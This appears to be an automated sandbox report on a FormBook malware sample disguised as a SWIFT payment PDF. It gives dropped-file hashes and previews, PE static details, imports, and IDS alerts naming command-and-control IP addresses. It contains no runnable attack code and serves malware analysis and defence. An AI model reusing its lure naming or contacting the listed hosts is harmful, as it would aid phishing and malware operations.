SHA-512:	497CF3874F3D5B4E14EB09EADD427893F872CD5CC01A77869D8B550B4545AD9D0AD5ACC8907C478D1AA83CBBF2B4015BDE7C41D9249E38F4C08B3A76635D2A60
Malicious:	false
Reputation:	low
Preview:	..re.L3YK.._....2O..qBF...QN772L3YKYANVPXQN772L3YKYANVPX.N77<S.WK.H.w.Y...cZ%@y;+.)$15q-VY\#Gy)<a<#>x8 .s}..4$=$`[]RuN772L3Y2XH.k0?.sWP.qS>.C..j86.-....9,.[...d1).e[/[d+>.NVPXQN77b.3Y.X@N+$..N772L3YK.ALW[YZN7a6L3YKYANVP(CN77"L3Y;]ANV.XQ^772N3YMYANVPXQH772L3YKY1JVPZQN772L1Y..ANFPXAN772\3Y[YANVPXAN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANx$=):772.f]KYQNVP.UN7'2L3YKYANVPXQN7.2LSYKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKY

C:\Users\user\AppData\Local\Temp\autA156.tmp

Process:	C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	14812
Entropy (8bit):	7.596495493702925
Encrypted:	false
SSDEEP:	384:k9/R/PZ/8euym6Bo2EGY0sPmacLcNeUX/IYLPW:kR/PJ8euGBSPmaocAWIiW
MD5:	B993559FE1642D0995051D612F77F569
SHA1:	6AD1FC0D5FF6EFE2B7C5915E525995F80E0D4C81
SHA-256:	1712EF02D5175AC4644E92C6E4A50CAA474AF17207AC94945372515FBA59D979
SHA-512:	87C2B55578BD782F4DDEE01F4A13CA39179EC23B6F23EA4BEEC12B54E0FB77AC34C236960DEAFA359F78E707F301E699F37B497F950082C91A818F7D468AB451
Malicious:	false
Reputation:	low
Preview:	EA06......3........SP.n......5e...`.....\|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....\|.0...&d.....Hz..a....l?..uo.....P......V0....j......\|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8\|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...\|...<..aw.].3c..H.@B?...G..1...' ....k\|.A.O..#.....}V`....#..H\|.P!..d....0z....Y..>K..G./....G.7c.H..b....W..1....?.01..b.!...@.?..o.F\|....p9......S.!..nb.!....zb0..

C:\Users\user\AppData\Local\Temp\bothsidedness

Process:	C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	172054
Entropy (8bit):	2.5797573256120265
Encrypted:	false
SSDEEP:	192:oUjxaM/0OCHqz+Q/muxDkrWRyBcyedHnCvd50GF2ikz8dWcZk4CNc/lWpSFIO8T5:R
MD5:	7239A3CB0F7553E28BF56D6E71978614
SHA1:	0642262209B7E19FD0CF34F98A995C9264F19399
SHA-256:	2B7C7D65865238B9C3A497E674A2D01C5D18DDCE647D60EF2C3F958CF27A0705
SHA-512:	70EE62B308034A0C915B042208D2522C3B87EAAEFAACFA177965965D6C5B4ECF4CAEAC366F22A9246FE40F2CB6F592B698FA691B81BAB838BD2571D4164FB4F7
Malicious:	false
Preview:	52110052110x52110552110552110852110b52110e52110c52110852110152110e52110c52110c52110c52110052110252110052110052110052110052110552110652110552110752110b52110852110652110b52110052110052110052110052110052110052110652110652110852110952110452110552110852110452110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110652110b52110a52110752110252110052110052110052110052110052110052110652110652110852110952110552110552110852110852110b52110852110652110e52110052110052110052110052110052110052110652110652110852110952110452110552110852110a52110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110c52110b52110a52110652110c52110052110052110052110052110052110052110652110652110852110952110552110552110852110e52110b52110852110352110352110052110052110052110052110052110052110652110652110852110952110452110552110952110052110b52110952110352110252110052110052110052110052110052110052110652110652110852110952110452110d5211

C:\Users\user\AppData\Local\Temp\c104-9J-L

Process:	C:\Windows\SysWOW64\DevicePairingWizard.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.1142956103012707
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
MD5:	E3F9717F45BF5FFD0A761794A10A5BB5
SHA1:	EBD823E350F725F29A7DE7971CD35D8C9A5616CC
SHA-256:	D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
SHA-512:	F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
Malicious:	false
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\quinquenniad

Process:	C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.993605473546579
Encrypted:	true
SSDEEP:	6144:AL5RYGU/ftTE5MgXnYQv32UtAWZwilTlM8PenU2tuE+lUJQju:SAtwn9v3POZwJ/PoduEUUJT
MD5:	98557C3094525C0F2AFA6BDE0897E724
SHA1:	76EBCEDF4C7B3A07205DD2CC7C21BE88D29575E1
SHA-256:	C95A780F71F323D6E47BF294052D0078E8F8F9CB4669274230B5231F81B24F4A
SHA-512:	497CF3874F3D5B4E14EB09EADD427893F872CD5CC01A77869D8B550B4545AD9D0AD5ACC8907C478D1AA83CBBF2B4015BDE7C41D9249E38F4C08B3A76635D2A60
Malicious:	false
Preview:	..re.L3YK.._....2O..qBF...QN772L3YKYANVPXQN772L3YKYANVPX.N77<S.WK.H.w.Y...cZ%@y;+.)$15q-VY\#Gy)<a<#>x8 .s}..4$=$`[]RuN772L3Y2XH.k0?.sWP.qS>.C..j86.-....9,.[...d1).e[/[d+>.NVPXQN77b.3Y.X@N+$..N772L3YK.ALW[YZN7a6L3YKYANVP(CN77"L3Y;]ANV.XQ^772N3YMYANVPXQH772L3YKY1JVPZQN772L1Y..ANFPXAN772\3Y[YANVPXAN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANx$=):772.f]KYQNVP.UN7'2L3YKYANVPXQN7.2LSYKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKYANVPXQN772L3YKY

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.213665561092086
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File size:	966'221 bytes
MD5:	fbc1b3a9567b4153601f2f845ecfedf2
SHA1:	c64a2e0ad636233b7f55fd0cb95e3a175d6170c0
SHA256:	214e00b6e262b442940ca666466022947d103e15837ed50723e6b6ea7d7279dc
SHA512:	ebc39eb92150a1d43d0f7c448802c4c97829feebf1dd150b585095aae45967b8eeed85da52202b25aa43b9d94462fb313caf394aa38effb9c37e6da0fb62f4c0
SSDEEP:	24576:uRmJkcoQricOIQxiZY1iaCZS90tO3KdSKMWfoOsHAz5:7JZoQrbTFZY1iaCS0TMWfolU
TLSH:	6725C022F5C59036C2B323B19E7EF76A963D69360326D2DB33C82D355EA05416B29733
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x4165c1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d3bf8a7746a8d1ee8f6e5960c3f69378

Entrypoint Preview

Instruction
call 00007F6A8897D6EBh
jmp 00007F6A8897455Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F6A889746DAh
cmp edi, eax
jc 00007F6A88974876h
cmp ecx, 00000080h
jc 00007F6A889746EEh
cmp dword ptr [004A9724h], 00000000h
je 00007F6A889746E5h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F6A889746D7h
jmp 00007F6A88974AB2h
test edi, 00000003h
jne 00007F6A889746E6h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F6A889746FBh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F6A889746DEh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F6A8ADECED7h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F6A8897469Eh
rep movsd
jmp dword ptr [00000000h+edx*4]

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d41c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x844	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8061c	0x80800	61ffce4768976fa0dd2a8f6a97b1417a	False	0.5583182605787937	data	6.684690148171278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xdfc0	0xe000	0354bc5f2376b5e9a4a3ba38b682dff1	False	0.36085728236607145	data	4.799741132252136	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a758	0x6800	8033f5a38941b4685bc2299e78f31221	False	0.15324519230769232	data	2.1500715391677487	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9328	0x9400	495451d7eb8326bd9fa2714869ea6de8	False	0.49002322635135137	data	5.541804843154628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x4d0	data	English	Great Britain	0.36363636363636365
RT_STRING	0xb2d08	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3308	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb3968	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3cf0	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3e48	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3ed0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3ee8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3f00	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3f18	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb40b8	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll	GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll	DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll	VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49789	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49732	208.91.197.27	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49728	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49733	208.91.197.27	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49752	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49730	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49734	208.91.197.27	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49791	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49793	208.91.197.27	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49754	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49753	84.32.84.32	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49762	13.248.169.48	80	TCP
2024-11-12T15:28:33.384396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49790	84.32.84.32	80	TCP
